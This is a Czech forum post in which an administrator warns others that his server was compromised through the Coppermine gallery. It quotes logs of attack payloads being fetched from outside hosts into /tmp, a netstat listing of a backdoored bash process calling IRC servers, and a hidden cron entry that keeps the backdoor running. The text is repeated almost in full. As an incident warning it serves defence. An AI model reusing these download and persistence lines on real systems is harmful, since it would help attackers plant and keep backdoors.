Hack galerie
Napsal: 08 úno 2009, 12:36
Zdravim,
ponevadz mi v noci hacknuli server pres stejnou galerii, co pouzivame na PFS, dovolim si vsechny (a admina hlavne) varovat.
V error_logu od apache tohle
--2009-02-08 06:08:26-- http://iceman.ro/20.txt
Resolving iceman.ro... 85.204.4.215
Connecting to iceman.ro|85.204.4.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17836 (17K) [text/plain]
Saving to: `/tmp/20.txt'
0K .......... ....... 100% 138K=0.1s
2009-02-08 06:08:27 (138 KB/s) - `/tmp/20.txt' saved [17836/17836]
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
--2009-02-08 06:47:53-- http://naughtyvibez.at/nou
Resolving naughtyvibez.at... 84.16.255.129
Connecting to naughtyvibez.at|84.16.255.129|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10920 (11K) [text/plain]
Saving to: `nou'
0K .......... 100% 403K=0.03s
2009-02-08 06:47:54 (403 KB/s) - `nou' saved [10920/10920]
V /tmp/ oba ty stazene soubory a jeste bezici updatovatko, ktere po zabiti nakazeneho bashe ho vzdy nahodilo a pri nahrani noveho, ho to zase infikovalo.
Takze pokud
netstat -tupan | grep bash
neco ukaze, rozhodne bych zbystril pozornost. Je to nejaky backdoor, ktery ceka na ovladani z druhe strany a nastesti bezi "jenom" s pravy apache a nikoliv roota.
Security update galerie je od 4. unora k dispozici na webu
http://coppermine-gallery.net/
Vlada
P. S. Ukazka
[root@obelix ~]# netstat -tupan | grep bash
tcp 0 1 192.168.0.1:55234 195.47.220.2:7000 SYN_SENT 7075/bash
tcp 0 1 192.168.0.1:39617 193.109.122.67:6667 SYN_SENT 7075/bash
tcp 0 1 192.168.1.1:44711 194.109.20.90:6663 SYN_SENT 7075/bash
tcp 0 1 192.168.2.1:52110 194.109.20.90:6667 SYN_SENT 7075/bash
tcp 0 1 10.0.0.1:36673 193.109.122.67:7000 SYN_SENT 7075/bash
tcp 0 1 192.168.2.1:60393 194.109.20.90:6660 SYN_SENT 7075/bash
tcp 0 1 192.168.1.1:43627 195.47.220.2:6667 SYN_SENT 7075/bash
tcp 0 1 10.0.0.1:54075 195.68.221.221:6667 SYN_SENT 7075/bash
udp 0 0 0.0.0.0:60271 0.0.0.0:* 7075/bash
OBELIX:~# cat /var/spool/cron/apache
* * * * * /tmp/.INEX-INST/update >/dev/null 2>&1
ponevadz mi v noci hacknuli server pres stejnou galerii, co pouzivame na PFS, dovolim si vsechny (a admina hlavne) varovat.
V error_logu od apache tohle
--2009-02-08 06:08:26-- http://iceman.ro/20.txt
Resolving iceman.ro... 85.204.4.215
Connecting to iceman.ro|85.204.4.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17836 (17K) [text/plain]
Saving to: `/tmp/20.txt'
0K .......... ....... 100% 138K=0.1s
2009-02-08 06:08:27 (138 KB/s) - `/tmp/20.txt' saved [17836/17836]
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
--2009-02-08 06:47:53-- http://naughtyvibez.at/nou
Resolving naughtyvibez.at... 84.16.255.129
Connecting to naughtyvibez.at|84.16.255.129|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10920 (11K) [text/plain]
Saving to: `nou'
0K .......... 100% 403K=0.03s
2009-02-08 06:47:54 (403 KB/s) - `nou' saved [10920/10920]
V /tmp/ oba ty stazene soubory a jeste bezici updatovatko, ktere po zabiti nakazeneho bashe ho vzdy nahodilo a pri nahrani noveho, ho to zase infikovalo.
Takze pokud
netstat -tupan | grep bash
neco ukaze, rozhodne bych zbystril pozornost. Je to nejaky backdoor, ktery ceka na ovladani z druhe strany a nastesti bezi "jenom" s pravy apache a nikoliv roota.
Security update galerie je od 4. unora k dispozici na webu
http://coppermine-gallery.net/
Vlada
P. S. Ukazka
[root@obelix ~]# netstat -tupan | grep bash
tcp 0 1 192.168.0.1:55234 195.47.220.2:7000 SYN_SENT 7075/bash
tcp 0 1 192.168.0.1:39617 193.109.122.67:6667 SYN_SENT 7075/bash
tcp 0 1 192.168.1.1:44711 194.109.20.90:6663 SYN_SENT 7075/bash
tcp 0 1 192.168.2.1:52110 194.109.20.90:6667 SYN_SENT 7075/bash
tcp 0 1 10.0.0.1:36673 193.109.122.67:7000 SYN_SENT 7075/bash
tcp 0 1 192.168.2.1:60393 194.109.20.90:6660 SYN_SENT 7075/bash
tcp 0 1 192.168.1.1:43627 195.47.220.2:6667 SYN_SENT 7075/bash
tcp 0 1 10.0.0.1:54075 195.68.221.221:6667 SYN_SENT 7075/bash
udp 0 0 0.0.0.0:60271 0.0.0.0:* 7075/bash
OBELIX:~# cat /var/spool/cron/apache
* * * * * /tmp/.INEX-INST/update >/dev/null 2>&1